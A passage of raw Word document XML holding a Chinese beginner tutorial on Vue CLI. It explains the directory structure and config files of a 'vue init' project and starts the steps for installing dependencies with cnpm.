          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录结构如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD97ABB" w14:textId="77777777" w:rsidR="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>介绍一下目录及其作用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C79C50" w14:textId="77777777" w:rsidR="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEC57D8" w14:textId="4354E747" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：最终发布的代码的存放位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07E2DF" w14:textId="13B28995" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：配置路径、端口号等一些信息，我们刚开始学习的时候选择默认配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1ABF1" w14:textId="77690A06" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">npm </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>加载的项目所需要的各种依赖模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D27D54" w14:textId="6C5441B1" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：这里是我们开发的主要目录（源码），基本上要做的事情都在这个目录里面，里面包含了几个目录及文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127C0AC0" w14:textId="7BA10BF2" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>assets:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>放置一些图片，如</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F913B6C" w14:textId="5870D4D0" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>components:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>目录里放的是一个个的组件文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AF9D52" w14:textId="049EBACC" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>router/index.js</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：配置路由的地方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD12AB9" w14:textId="2E0EB0BB" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>App.vue</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：项目入口组件（跟组件），我们也可以将组件写这里，而不使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>components</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>目录。主要作用就是将我们自己定义的组件通过它与页面建立联系进行渲染，这里面的</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;router-view/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>必不可少。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148EB3B7" w14:textId="14A58C93" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">main.js </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：项目的核心文件（整个项目的入口</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>）引入依赖包、默认页面样式等（项目运行后会在</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>中形成一个</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>app.js</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>文件）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B80598E" w14:textId="452AC3C7" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：静态资源目录，如图片、字体等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D0A7F" w14:textId="55053E10" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：初始测试目录，可删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC4582" w14:textId="04192DF8" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.XXXX</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>文件：配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A053D6" w14:textId="32C9D5BB" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>单页面的入口页面，可以添加一些</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>meta</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>信息或者同统计代码啥的或页面的重置样式等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE033AE" w14:textId="2B7140A5" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：项目配置信息文件</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>所依赖的开发包的版本信息及所依赖的插件信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C85E7" w14:textId="0D02472D" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>README.md</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：项目的说明文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4CB9D" w14:textId="102F98B6" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>webpack.config.js</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>webpack</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的配置文件，把</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.vue</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的文件打包成浏览器能读懂的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDDF8DA" w14:textId="5C2EF310" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.babelrc:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>是检测</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>es6</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>语法的文件的配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD2CB4" w14:textId="538CD0B1" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.getignore:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>忽略文件的配置（比如模拟本地数据</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mock</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>不让他在</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>打包上线的时候忽略不使用可在这里配置）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1F9BF" w14:textId="026ABACC" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.postcssrc.js:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>前缀的配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F9241" w14:textId="7D1DFC73" w:rsidR="004D0AD5" w:rsidRPr="004D0AD5" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.eslintrc.js:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eslint</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>语法规则（在这里面的</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>属性中配置让哪个语法规则失效）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445AA11" w14:textId="444A9AB5" w:rsidR="00615D6B" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.eslintignore:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>忽略</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eslint</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>对项目某些文件的语法规则的检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A43E4" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13841894" w14:textId="77777777" w:rsidR="00F81627" w:rsidRDefault="00F81627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就是整个项目的目录结构，其中，我们主要在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中做修改（模块化开发）。这个项目现在还只是一个结构框架，整个项目需要的依赖资源都还没有安装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF7BC45" w14:textId="77777777" w:rsidR="00F81627" w:rsidRDefault="00F81627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6950FBA4" w14:textId="6DFE2A41" w:rsidR="00F81627" w:rsidRPr="00F81627" w:rsidRDefault="00F81627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>项目名；进入项目中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2AD59" w14:textId="77777777" w:rsidR="00F81627" w:rsidRDefault="00F81627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280DAF84" w14:textId="2163E19B" w:rsidR="00F81627" w:rsidRDefault="00F81627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装项目所需要的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>依赖包</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>插件（在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>可查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> cnpm install (npm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>可能会有警告，这里可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>cnpm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
